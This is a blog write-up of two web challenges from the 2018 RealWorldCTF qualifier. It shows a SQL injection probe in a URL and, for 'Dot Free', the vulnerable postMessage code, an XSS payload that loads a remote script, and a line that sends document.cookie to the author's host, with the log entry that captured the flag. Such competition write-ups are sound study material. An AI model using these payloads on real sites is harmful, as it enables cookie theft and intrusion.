🦊Back to NiNi's Den

2018::RealWorldCTF::Qual

CTF RealWorldCTF Web
Word count: 390Reading time: 2 min
2018/07/30 Share

RealWorld CTF is very interesting and that is the hardest check-in challenge I’ve ever saw.

Advertisement

This challenge gave nothing, but just one line

This platform is under protection. DO NOT hack it.

Trying not to hack the web, but I can’t find anything.
I did find something interesting, like this one:

It seems to use WebSocket to get some information then render it on template view.
So, let’s change the hash-like string on url.

When url is https://realworldctf.com/contest/5

When url is https://realworldctf.com/contest/5b5bc8c532a7ca004d2d0f64 (Make the length of hash-like string consist with origin)

Did you say Database?
https://realworldctf.com/contest/' or '1'='1' --

My teamate kaibro told me that chaitin has sqlchop product…. ohh…. advertisement… got it
It took me half day to find the flag

Dot Free

There are some js functoin on web page:

function lls(src) {
    var el = document.createElement('script');
    if (el) {
        el.setAttribute('type', 'text/javascript');
        el.src = src;
        document.body.appendChild(el);
    }
};

function lce(doc, def, parent) {
// ...
};
window.addEventListener('message', function (e) {
    if (e.data.iframe) {
        if (e.data.iframe && e.data.iframe.value.indexOf('.') == -1 && e.data.iframe.value.indexOf("//") == -1 && e.data.iframe.value.indexOf("。") == -1 && e.data.iframe.value && typeof(e.data.iframe != 'object')) {
            if (e.data.iframe.type == "iframe") {
                lce(doc, ['iframe', 'width', '0', 'height', '0', 'src', e.data.iframe.value], parent);
            } else {
                lls(e.data.iframe.value)
            }
        }
    }
}, false);
window.onload = function (ev) {
    postMessage(JSON.parse(decodeURIComponent(location.search.substr(1))), '*')
}

And I found some keyword like login passwd,login account in css, so I think that we can try to XSS.

We append string to url, the xxxxxxxx part sould replaced by ip in integer form:
http://13.57.104.34/?{"iframe":{"value":"http:\\\\xxxxxxxx"}}

And put a javascript on your machine:
document.location="http:\\\\my.ip.put.here/a?cookie="+document.cookie;

Then go to apache log to get the flag:
13.57.104.34 - - [29/Jul/2018:14:36:15 +0000] "GET /a?cookie=flag=rwctf%7BL00kI5TheFlo9%7D HTTP/1.1" 404 496

Original Author: Terrynini

Original link: http://blog.terrynini.tw/en/2018-RealWorldCTF-Qual/

Publish at: July 30th 2018, 2:11:03

Copyright: This article is licensed under CC BY-NC 4.0

CATALOG
  1. 1. Advertisement
  2. 2. Dot Free
Total : 39
2023
2022
2021
2020
2019
2018
2017
CTF Reverse HITCON SECCON 0CTF ASIS RealWorldCTF Web CONFidence Flare-On Plaid Pragyan AFL++ QEMU Balsn Algorithm AIS3 Reversing-kr Cryptography Pwn Misc OSCP OS Base64 AVX FaceBook GIF Windows browser Chakra JIT Travel
WriteUp Record Reminder Note TodayILearn